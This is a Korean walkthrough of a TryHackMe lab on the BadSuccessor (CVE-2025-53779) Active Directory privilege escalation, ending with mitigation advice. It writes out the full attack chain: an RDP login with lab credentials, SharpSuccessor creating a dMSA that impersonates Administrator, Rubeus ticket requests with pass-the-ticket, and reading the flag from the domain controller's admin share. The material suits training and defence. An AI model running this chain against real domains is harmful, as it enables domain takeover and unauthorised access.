
Windows를 사용한 CVE-2025-53779 악용을 다루는 TryHackme 룸
이 룸에서는 Active Directory의 위임된 관리 서비스 계정(dMSA)을 악용하는 취약점인 BadSuccessor 권한 상승 기법을 살펴봅니다. 이 공격을 통해 dMSA 개체에 대한 충분한 제어 권한을 가진 사용자는 다른 계정을 가장하고 잠재적으로 도메인 관리자 권한을 획득할 수 있습니다.
Room: https://tryhackme.com/room/adbadsuccessor
난이도: 중간
날짜: 05/06/2026
버전: 1.0
목적: 위임된 관리 서비스 계정이 어떻게 악용되어 권한을 상승시키고 Active Directory 환경을 손상시킬 수 있는지 시연합니다.
역할: Terry Byte (tbyte)
목표: 새로 배포된 Active Directory 환경의 보안을 평가하고 BadSuccessor 공격에 취약한지 확인합니다.
이 공격은 두 가지 주요 단계로 구성됩니다:
xfreerdp /v:10.211.101.20 /u:tbyte /p:P\@SSw0rd345 /dynamic-resolution
PoC 디렉터리로 이동합니다:
cd C:\PoC
내용을 확인합니다: dir
https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1
notepad Get-BadSuccessorOUPermissions.ps1
.\Get-BadSuccessorOUPermissions.ps1
SharpSuccessor를 사용하여 Administrator 계정을 가장하는 위임된 관리 서비스 계정을 생성합니다:
.\SharpSuccessor.exe add /path:"ou=LabOU,dc=tryhackme,dc=local" /account:tbyte /name:pentest_dmsa /impersonate:Administrator
어떤 일이 발생하나요?
Rubeus를 사용하여 위임된 티켓 부여 티켓(TGT)을 획득합니다:
.\Rubeus.exe tgtdeleg /nowrap
이 명령은 Base64로 인코딩된 Kerberos 티켓을 반환합니다.
생성된 티켓을 복사합니다.
.\Rubeus.exe asktgs /targetuser:pentest_dmsa$ /service:krbtgt/tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
결과:
dMSA 계정에 대한 새 Kerberos 티켓이 메모리에 주입됩니다.
dMSA 티켓을 활용하여 Administrator 컨텍스트에서 실행 중인 서비스에 대한 액세스 권한을 얻습니다:
.\Rubeus.exe asktgs /user:pentest_dmsa$ /service:cifs/DC-LAB2025-01.tryhackme.local /opsec /dmsa /nowrap /ptt /ticket:<Base64_Ticket>
결과:
dir \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\
Administrator 데스크톱에 저장된 플래그를 읽습니다:
Get-Content \\DC-LAB2025-01.tryhackme.local\c$\Users\Administrator\Desktop\flag.txt
플래그를 성공적으로 획득했습니다.
BadSuccessor는 위임된 관리 서비스 계정이 Active Directory 환경에서 권한 상승 경로를 만들 수 있음을 보여줍니다. Active Directory는 많은 조직의 정체성(identity) 기반 역할을 하며, Kerberos 및 계정 위임에 영향을 미치는 취약점은 심각한 결과를 초래할 수 있습니다.
dMSA 개체에 대해 충분한 권한을 가진 공격자는 다음을 수행할 수 있습니다:
BadSuccessor(CVE-2025-53779)를 완화하기 위해 조직은 Microsoft의 보안 업데이트를 신속하게 적용하고, dMSA 권한을 제한 및 검토하며, 의심스러운 Kerberos 활동을 모니터링하고, 위임 관계를 감사하며, 최소 권한 원칙을 적용해야 합니다. Active Directory 위임 설정을 정기적으로 검토하면 잠재적인 권한 상승 경로를 식별하고 줄이는 데 도움이 될 수 있습니다.
이 룸에서는 다음과 같은 실습 경험을 얻을 수 있었습니다: